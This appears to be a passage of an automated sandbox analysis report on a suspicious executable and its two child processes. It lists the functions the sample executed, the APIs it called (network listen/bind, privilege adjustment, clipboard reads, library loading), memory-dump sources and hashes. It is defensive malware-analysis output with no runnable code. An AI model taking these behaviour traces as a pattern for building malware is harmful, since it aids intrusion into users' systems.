Instruction Fuzzy Hash: 8A1114B6D00209CFDF10CFA9C484BDEFBF4AB48324F14846AE919AB600C378A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01C59870, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01C598D6

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7991284b9b6c5f89e6bb3b6504ddfbbf6088c064ad4712a1c2fa55398dd22ad0
Instruction ID: a0cf6883c7d1a763571f2536a642d86e8e2cd11ce3e4fdbdb4e45a9e7eb4a2f4
Opcode Fuzzy Hash: 7991284b9b6c5f89e6bb3b6504ddfbbf6088c064ad4712a1c2fa55398dd22ad0
Instruction Fuzzy Hash: F91102B5C00209CFDB10DF9AC444ADEFBF4EB88324F14846AD819A7200C378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 018AD4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.279697661.00000000018AD000.00000040.00000001.sdmp, Offset: 018AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84293deb767e194d2226de869c9be174464eff0668ee69fa9781d3ac4df7fddb
Instruction ID: 29142116c6babdb53d59e3aa1c1f7a25939efc8624d0ce13bf11202c192cf4a1
Opcode Fuzzy Hash: 84293deb767e194d2226de869c9be174464eff0668ee69fa9781d3ac4df7fddb
Instruction Fuzzy Hash: 5F2133B1504244DFEB01EF58C8C0B26BF65FB88328F24C6A9E945CB606C336D916CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 018BD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.279735256.00000000018BD000.00000040.00000001.sdmp, Offset: 018BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078b569bc4efd844e14644d386c391cc08b8f1e5916e8d1ce038ae1067c4dd1b
Instruction ID: 4cbf9e73df308795e84285f75a0d488ba5e8e633b9eb1b136c79b102abb60a61
Opcode Fuzzy Hash: 078b569bc4efd844e14644d386c391cc08b8f1e5916e8d1ce038ae1067c4dd1b
Instruction Fuzzy Hash: 18212571504204EFCB15DF68D8C0B66BB65FB8435CF24C6A9E9098B346C33AD907CA61

Uniqueness

Uniqueness Score: -1.00%

Function 018BD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.279735256.00000000018BD000.00000040.00000001.sdmp, Offset: 018BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6487a1c6ba48263c0c085c321a05b28b6d0a9718f2714cc9be1d70938390a6
Instruction ID: 1bfbdb6d655156dae70bb89ae54336a5289e8e92122e281ae02fe3ad0326ff89
Opcode Fuzzy Hash: 8a6487a1c6ba48263c0c085c321a05b28b6d0a9718f2714cc9be1d70938390a6
Instruction Fuzzy Hash: AD2180755083809FCB02CF64D9D4B11BF71EB46314F28C6EAD8498B267C33A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 018AD4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.279697661.00000000018AD000.00000040.00000001.sdmp, Offset: 018AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
Instruction ID: cf48458ead98fcda38dda3bb9bc53f49ec309c50a4070da2f3d1e65e63fd2d8f
Opcode Fuzzy Hash: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
Instruction Fuzzy Hash: 8011D376804280CFDB12CF54D5C4B16BF71FB84324F28C6A9E8458B617C336D55ADBA1

Uniqueness

Uniqueness Score: -1.00%

Function 018AD731, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.279697661.00000000018AD000.00000040.00000001.sdmp, Offset: 018AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541bd3e56e293d45b8f3f8b77ba69306e66b7d436cacb530b1e16a6dd4d30ba9
Instruction ID: 14e6a0f1cdbf6b8468476cabbd6ae4cfda6484c75602c450b0abcadc908b4d77
Opcode Fuzzy Hash: 541bd3e56e293d45b8f3f8b77ba69306e66b7d436cacb530b1e16a6dd4d30ba9
Instruction Fuzzy Hash: 2901F7714083889BFB245B69CC80766BFD8EF40328F58C65AED04DB642D3799944C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 018AD730, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.279697661.00000000018AD000.00000040.00000001.sdmp, Offset: 018AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3d249d10e040e532d231f7fe7bc3b539fed6be95a51cb02c57617c2c98f640d
Instruction ID: 3cbed160f73d486e1fa45d4aa162293432246cfdcf0ce5aebb49ce4ae6259d6b
Opcode Fuzzy Hash: d3d249d10e040e532d231f7fe7bc3b539fed6be95a51cb02c57617c2c98f640d
Instruction Fuzzy Hash: 55F062724042849FFB158E19CC84B66FFD8EB81734F18C55AED189B686C3789844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01C5E470, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d8eafb2e85b1ace2715962e3ba4cda6048c0701c8f8d52cdcd42ec3d6e2b55
Instruction ID: 80c853caddd5f3d6a50fd856fb6f70e6c59b150a6580ee8e2119f2142a2abb94
Opcode Fuzzy Hash: 11d8eafb2e85b1ace2715962e3ba4cda6048c0701c8f8d52cdcd42ec3d6e2b55
Instruction Fuzzy Hash: 4912D4F54117468AD330CF64E9CA3EDBBA0F765328B904208D2632BAD9D7F8954ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 01C5C4CC, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9cd3b1f1ed152158a68d5ad77176132357a4bd3a2b79a2baf712649579233e
Instruction ID: 08653ee5b59ddb4ac969d5e94fbeb6c83f6050c20a5a82de35d5b78dae48e28c
Opcode Fuzzy Hash: 0d9cd3b1f1ed152158a68d5ad77176132357a4bd3a2b79a2baf712649579233e
Instruction Fuzzy Hash: 91A16F32E0031ACFCF15DFE5C8445AEBBB6FF85304B15856AE906AB221EB71E945DB40

Uniqueness

Uniqueness Score: -1.00%

Function 01C5E463, Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7021e934281377e9f35357b058277b3b027cb5ac25c4881e4b261e285fae2b7e
Instruction ID: 25fb02638283743b688965aa658fb3a2e1bfbe0c727c66f7184fe796b868cef8
Opcode Fuzzy Hash: 7021e934281377e9f35357b058277b3b027cb5ac25c4881e4b261e285fae2b7e
Instruction Fuzzy Hash: 96C127B18117468AD720CF64E9C93EDBBB1FBA5328F514208D2632BAD8D7F4944ACF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: B6LNCKjOGt5EmFQ.exe PID: 5336 Parent PID: 6076 B6LNCKjOGt5EmFQ.exeCOMMON

Executed Functions

Function 0040104C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401051

Strings

VB5!6&*, xrefs: 0040104C

Memory Dump Source

Source File: 00000008.00000002.298769005.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 3cdc8536199cd560e2627349f8158df96f2d3e5b25d6b8b93e5c5f73a6db8eeb
Instruction ID: a12084c55d1ffc36602276b3cafedaf3d59f71825310c224ab85d25d8918c0d8
Opcode Fuzzy Hash: 3cdc8536199cd560e2627349f8158df96f2d3e5b25d6b8b93e5c5f73a6db8eeb
Instruction Fuzzy Hash: F1D0A44004E3C40ED30756B60DA56862F70090325031A00EBC5C0EE4E3805C09888336

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: LOGO AND PICTURES.exe PID: 6208 Parent PID: 5336 LOGO AND PICTURES.exeCOMMON

Executed Functions

Function 03211C30, Relevance: 3.4, APIs: 2, Instructions: 398libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03211C4F
KiUserExceptionDispatcher.NTDLL(00000000), ref: 0321213B

Memory Dump Source

Source File: 00000009.00000002.611470549.0000000003210000.00000040.00000001.sdmp, Offset: 03210000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 3ec80b83c813eb0933d665ab6c2d47a661841e07de0969dd07599acdcb869423
Instruction ID: b95dd976fb7be90b9f6428bcf46134efbdf8220d24ce040e077ec253d9dfb460
Opcode Fuzzy Hash: 3ec80b83c813eb0933d665ab6c2d47a661841e07de0969dd07599acdcb869423
Instruction Fuzzy Hash: DFF16D70E002099FDB14DFA8C984B9EB7F2BF88304F158569E505AB385DB74ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03218390, Relevance: 1.9, APIs: 1, Instructions: 422libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,032182C9,00000800), ref: 0321835A

Memory Dump Source

Source File: 00000009.00000002.611470549.0000000003210000.00000040.00000001.sdmp, Offset: 03210000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c01fea2db836d2bd830b9fd38621515409d70879d8d3486f505b16d4eb717f3
Instruction ID: c8c91c2e7dc33d99a9ea63f8ea25252004850172f88d557cbc87374f118c34a3
Opcode Fuzzy Hash: 9c01fea2db836d2bd830b9fd38621515409d70879d8d3486f505b16d4eb717f3
Instruction Fuzzy Hash: 51E1B371B002049FDB24EBB4C8597AEBAE6EFC8304F198429E406DB784DF749D45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 030CA6D4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 030CA7C7

Strings

76*, xrefs: 030CA722
76*, xrefs: 030CA702

Memory Dump Source

Source File: 00000009.00000002.611043887.00000000030C0000.00000040.00000001.sdmp, Offset: 030C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: 76*$76*
API String ID: 1029625771-2040975748
Opcode ID: 2839cf85b411932cc8577e73e3966bee5606e30ed8db59f7c87af8f0d8475818
Instruction ID: 6b9c1ffd5885386831de6d8b453abfa7d0d8c7d1c7f6a050f4c134519f948318
Opcode Fuzzy Hash: 2839cf85b411932cc8577e73e3966bee5606e30ed8db59f7c87af8f0d8475818
Instruction Fuzzy Hash: 494148B0E112998FDB10CFA9C88479EBBF1FB48314F148229E815EB384D7789846CF91

Uniqueness

Uniqueness Score: -1.00%

Function 030C70C8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 030CA7C7

Strings

76*, xrefs: 030CA722
76*, xrefs: 030CA702

Memory Dump Source

Source File: 00000009.00000002.611043887.00000000030C0000.00000040.00000001.sdmp, Offset: 030C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: 76*$76*
API String ID: 1029625771-2040975748
Opcode ID: 86fea383492409c7d06d0a0f4595cfde428b7393acb2c6520495637b9bef476a
Instruction ID: e19afb37973e7422f8e93b94de6510deaa218d6796c18af0df5e92b3a1d3d855
Opcode Fuzzy Hash: 86fea383492409c7d06d0a0f4595cfde428b7393acb2c6520495637b9bef476a
Instruction Fuzzy Hash: D24136B0E112589FDB10CFA9C88479EBBF1FB48714F148129E815EB384D7789846CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01353BF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000050), ref: 01353C83

Strings

76*, xrefs: 01353C1F

Memory Dump Source

Source File: 00000009.00000002.607249756.0000000001350000.00000040.00000001.sdmp, Offset: 01350000, based on PE: false

Similarity

API ID: MetricsSystem
String ID: 76*
API String ID: 4116985748-1490856640
Opcode ID: e75bfad9bfbaef563d67b5a17641e4a042b47e3eb7ce511c6d1e48848d9b837f
Instruction ID: 549724fc163cdffc79b466abd355e17ed49dc05accc5f5c7d87d97286116e044
Opcode Fuzzy Hash: e75bfad9bfbaef563d67b5a17641e4a042b47e3eb7ce511c6d1e48848d9b837f
Instruction Fuzzy Hash: B631AE70D042198FCB20EFA9D444AAEBBB4FF49728F14845AD954AB381C739A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013511AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 01351240

Strings

76*, xrefs: 013511DA

Memory Dump Source

Source File: 00000009.00000002.607249756.0000000001350000.00000040.00000001.sdmp, Offset: 01350000, based on PE: false

Similarity

API ID: Clipboard
String ID: 76*
API String ID: 220874293-1490856640
Opcode ID: d86a718d12a996832645a618a41057e2c1272e897b0d6663d7d25e31a0bb729e
Instruction ID: db20c93c67fe2643625fd71154202f32e7e494da228fcbae1ad7d77414829293
Opcode Fuzzy Hash: d86a718d12a996832645a618a41057e2c1272e897b0d6663d7d25e31a0bb729e
Instruction Fuzzy Hash: 4131EFB0D01208DFDB54DFA9C884BDEBBF4AF89718F248059E805AB294C7B5A945CF61

Uniqueness

Uniqueness Score: -1.00%

Function 013511B8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 01351240

Strings

76*, xrefs: 013511DA

Memory Dump Source

Source File: 00000009.00000002.607249756.0000000001350000.00000040.00000001.sdmp, Offset: 01350000, based on PE: false

Similarity

API ID: Clipboard
String ID: 76*
API String ID: 220874293-1490856640
Opcode ID: c8c00f51509457f99cd699e32e1e8c73c0c6f6555b9aa3bccb5601c7b5c76656
Instruction ID: 2b9a47b799ab73e423859a6cb3ef8da3c7fbdc0964b453ed97dfbc90f8c62ea1
Opcode Fuzzy Hash: c8c00f51509457f99cd699e32e1e8c73c0c6f6555b9aa3bccb5601c7b5c76656
Instruction Fuzzy Hash: 7231F1B0D01248DFDB14DF99C884BCEBBF5AF48718F248019E504AB394DBB46945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 032182E8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,032182C9,00000800), ref: 0321835A

Strings

76*, xrefs: 0321830F

Memory Dump Source

Source File: 00000009.00000002.611470549.0000000003210000.00000040.00000001.sdmp, Offset: 03210000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: 76*
API String ID: 1029625771-1490856640
Opcode ID: 281ab478ec7878d97612849c06b799251486c596559f3c7a9e8ac36f33fe28e9
Instruction ID: 2d0b0522ded814989ff03ee850df17ec14c8851a7781edb13f7daf1a4bbbf306
Opcode Fuzzy Hash: 281ab478ec7878d97612849c06b799251486c596559f3c7a9e8ac36f33fe28e9
Instruction Fuzzy Hash: 001126B6D003498FDB14DFAAD484BDEFBF4EB98324F14851AE419A7200C379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 03216084, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,032182C9,00000800), ref: 0321835A

Strings

76*, xrefs: 0321830F

Memory Dump Source

Source File: 00000009.00000002.611470549.0000000003210000.00000040.00000001.sdmp, Offset: 03210000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: 76*
API String ID: 1029625771-1490856640
Opcode ID: 83c8793d3e2f119d4beb74129d18c688b42da8dc5e1315a85749db49a49022a7
Instruction ID: b9b8a4b7c9e0d068f4e4672fb7126e778b67328a654f1f8524c2d07d3ffd9dc1
Opcode Fuzzy Hash: 83c8793d3e2f119d4beb74129d18c688b42da8dc5e1315a85749db49a49022a7
Instruction Fuzzy Hash: 331117B59002098FCB10DF9AC584BDEFBF4EB48314F14851AE519B7200C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013508E1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 01350945

Strings

76*, xrefs: 01350907

Memory Dump Source

Source File: 00000009.00000002.607249756.0000000001350000.00000040.00000001.sdmp, Offset: 01350000, based on PE: false

Similarity

API ID: DispatchMessage
String ID: 76*
API String ID: 2061451462-1490856640
Opcode ID: 795d7b61c94ec8391415fd6e0f921fea5b0e39a7bd7244e561ba8a385ec36da5
Instruction ID: 23d4ef331e65a28a3a76f417cca88fd7055d2add9b28cf530c4a01317b9fb768
Opcode Fuzzy Hash: 795d7b61c94ec8391415fd6e0f921fea5b0e39a7bd7244e561ba8a385ec36da5
Instruction Fuzzy Hash: D4112EB5C006488FDB24DF9AD884BDEFBF4EB48324F10851AE919A3600C379A544CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 013508E8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 01350945

Strings

76*, xrefs: 01350907

Memory Dump Source

Source File: 00000009.00000002.607249756.0000000001350000.00000040.00000001.sdmp, Offset: 01350000, based on PE: false

Similarity

API ID: DispatchMessage
String ID: 76*
API String ID: 2061451462-1490856640
Opcode ID: 74d1336dbfbaaa0d20c1747d7b049a7d8952b1b1d0597a84e63f47894d36cc69
Instruction ID: a12f770198bc05b8f1c7d36ee837a415e459a30ddb44ce3bd7806593f027c786
Opcode Fuzzy Hash: 74d1336dbfbaaa0d20c1747d7b049a7d8952b1b1d0597a84e63f47894d36cc69
Instruction Fuzzy Hash: 8B1112B5C006498FDB14DF9AD844BCEFBF4EB48324F10851AE819A3310C379A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 03211C1F, Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03211C4F

Memory Dump Source

Source File: 00000009.00000002.611470549.0000000003210000.00000040.00000001.sdmp, Offset: 03210000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4441d91a67ec0c5aedbc512e73b526b717ec28ec668385cc7bd6fa9ba557571a
Instruction ID: 201acd89b96c1da1a7cb66d5125e058082b4aed63acf36ce35203cecf9716b6c
Opcode Fuzzy Hash: 4441d91a67ec0c5aedbc512e73b526b717ec28ec668385cc7bd6fa9ba557571a
Instruction Fuzzy Hash: 5C31BC70E01218CFCB14DFA8C5446CDBBF1EF88314F2085AAD410AB385DBB5AD96CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0182D428, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.610187231.000000000182D000.00000040.00000001.sdmp, Offset: 0182D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1507533c214ae04fc5dd1b547bd5b10def0fc475f0fbc880338c7d8a3594a07e
Instruction ID: 755f56ff52eac30fa6902011bfd2f1d5c6ddbd1d61c1cc87656f3c701353af0d
Opcode Fuzzy Hash: 1507533c214ae04fc5dd1b547bd5b10def0fc475f0fbc880338c7d8a3594a07e
Instruction Fuzzy Hash: F12167B1504244DFDF02DF54C9C0B66BF65FB88328F20C6A9E9098B207C336E996C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D204, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.610309445.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d8d2a16921b7e9acc809308e0d5d752bfcffa7005619546236c988d7fbd4342
Instruction ID: 052848eafcabb78cfcef3e1adcf4b3d97840f813f18af498565ed297f310a66c
Opcode Fuzzy Hash: 6d8d2a16921b7e9acc809308e0d5d752bfcffa7005619546236c988d7fbd4342
Instruction Fuzzy Hash: C92168B1504204DFDB01DF94D8C0B26BB65FBC8334F68C669E8098B246C376E906C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D030, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.610309445.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bde1c7340c7a8a7e2badeef86c1c09b0681509e2e09ab8fbb833a1c237096b5
Instruction ID: 22046e5c99efd92511b05bfbdada5f04399a7673867d7d1aae2f194c20ed1f2e
Opcode Fuzzy Hash: 2bde1c7340c7a8a7e2badeef86c1c09b0681509e2e09ab8fbb833a1c237096b5
Instruction Fuzzy Hash: AA2125B1508204DFCB11DF54D9D0B26FBA5FBC4718F28C6A9E9098B246C376D947CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D3B4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.610309445.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44723f23e97b8d43c19bcd7cfc3e2018ee110d3cdcfbd333c2a4a348d36577b2
Instruction ID: 214e8cb6f4ab55c9b1ca3ecb53123db1691f148352a0f487ca709701b4e546a2
Opcode Fuzzy Hash: 44723f23e97b8d43c19bcd7cfc3e2018ee110d3cdcfbd333c2a4a348d36577b2
Instruction Fuzzy Hash: 98210771504204DFDB01DF64D5C0B66BB65FBC4318F68C6ADE9498B242C33AE956CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0182D423, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.610187231.000000000182D000.00000040.00000001.sdmp, Offset: 0182D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
Instruction ID: 66eb3037396b173fcb9b1a05e344770b4e0f0d1d0292ded32b3bdcbc76b122dc
Opcode Fuzzy Hash: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
Instruction Fuzzy Hash: F611D376404280DFDB12CF54D5C4B56BF71FB88324F24C6A9D8094B657C336D59ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D02B, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.610309445.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2843292ebbf6a814d7a2286815bab37d73136ec5010e940f27b85643756957ed
Instruction ID: b8be1740d247d56a8baabdcec7c405c4bc80d27b27a686df6cd89eb019c4546c
Opcode Fuzzy Hash: 2843292ebbf6a814d7a2286815bab37d73136ec5010e940f27b85643756957ed
Instruction Fuzzy Hash: AF11DD75504280CFCB12CF58D5D0B15FFB1FB84324F28C6AAD8498B656C33AD44ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0183D3AF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.610309445.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2843292ebbf6a814d7a2286815bab37d73136ec5010e940f27b85643756957ed
Instruction ID: d723a78d23487e03adac5f15aa34c4f4a8a7ec114d4433ff4bc7996b5fe45fc9
Opcode Fuzzy Hash: 2843292ebbf6a814d7a2286815bab37d73136ec5010e940f27b85643756957ed
Instruction Fuzzy Hash: BE119D75504280DFDB02CF64D5C4B55FFA1FB84324F28C6A9D8498B656C33AE54ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D1FF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.610309445.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1844803188182e9c504a77fe20300d1efffe664105d1227483171ce2a1709a
Instruction ID: 87e41ba723fb003901bac7c85e381fd3c536e4bfa19e5076b2cda074288548f1
Opcode Fuzzy Hash: 0b1844803188182e9c504a77fe20300d1efffe664105d1227483171ce2a1709a
Instruction Fuzzy Hash: 4311C176904284CFDB12CF54D5C4B15FF71FB84324F28C6AAD8484B646C37AE54ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Pictures.exe PID: 6240 Parent PID: 5336 Pictures.exeCOMMON

Executed Functions

Function 04A20A50, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

listen.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20AE4

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: listen
String ID:
API String ID: 3257165821-0
Opcode ID: 5cd703f96d977db837d87f2526839f8cc76defe095cfaee577ed7f6affedb397
Instruction ID: df40d89a0b1f4c941799974e87837dd6935e7280ad48413429965e08b2fbc3ec
Opcode Fuzzy Hash: 5cd703f96d977db837d87f2526839f8cc76defe095cfaee577ed7f6affedb397
Instruction Fuzzy Hash: 442102B2408784AFE7128F18DC45F96BFA8EF42324F08849BEA449F192D374A905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A20E6B, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20EFF

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 327bfabfdab2506fb1f77795aaddba364cd15fc06d18f0e62d233c788b5e0359
Instruction ID: 1bcdcd143af306c6706917bb08e6876157432208f02823396beb442fa46421f3
Opcode Fuzzy Hash: 327bfabfdab2506fb1f77795aaddba364cd15fc06d18f0e62d233c788b5e0359
Instruction Fuzzy Hash: 11218271409384AFD7128F65CC44F96BFB8EF46310F0884EBEA449F152D264A945CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A24E1B, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04A24E9B

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 86ce979f014dd8dbe5c3caa527ca781aac7310098284c6f5cdb6bc9e8c19b951
Instruction ID: 31ff1a0e7acd6240bb6dade2d8d97688912007b5c0924d6f4d3b1fdb636c26ed
Opcode Fuzzy Hash: 86ce979f014dd8dbe5c3caa527ca781aac7310098284c6f5cdb6bc9e8c19b951
Instruction Fuzzy Hash: AB21BF75509784AFEB128F25DD40B92BFF8EF06210F0884DAE9848F163D270A918DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A253FA, Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04A25479

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: dbc712d536727202e63bbeef237f87d52f3aa38e427682e3bcad633fa4343e19
Instruction ID: a82ccba36560aa7d962d6be06576a43a17719335d60cb6153115e2654faa18c7
Opcode Fuzzy Hash: dbc712d536727202e63bbeef237f87d52f3aa38e427682e3bcad633fa4343e19
Instruction Fuzzy Hash: 4021AB714093C0AFDB128F258864AA2FFB0AF06224F1C84DED9C44F163D266A55ADB22

Uniqueness

Uniqueness Score: -1.00%

Function 04A22D4A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A22DC8

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: 4a93bd469f6d45f2a25ceb0dbfdd70c7741ec083ef7f30f037b3badadcda7d48
Instruction ID: bd97dd1344ea1dbed2b49324c38e2c646ab49b719e880161168a284557a14fee
